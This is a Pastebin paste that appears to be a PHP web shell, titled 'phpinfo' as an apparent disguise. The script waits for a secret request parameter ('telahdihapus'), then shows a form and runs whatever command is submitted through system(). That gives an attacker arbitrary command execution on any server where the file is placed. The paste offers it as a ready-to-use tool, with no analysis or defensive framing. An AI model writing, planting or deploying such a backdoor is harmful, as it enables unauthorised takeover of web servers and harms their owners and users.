Advertisement
Guest User

phpinfo | like-bug.blogspot.com

a guest
Apr 28th, 2017
71
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.32 KB | None | 0 0
  1. <?php
  2. if(isset($_REQUEST['telahdihapus'])){
  3.         echo "<pre>";
  4.         echo "<form name='form' action='#' method='post'>
  5.        <input type='text' name='coba'/> <input type='submit' value='enter'/>
  6.        </form>";
  7.         $cmd = ($_POST['coba']);
  8.         system($cmd);
  9.         echo "</pre>";
  10.         die;
  11. }
  12. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement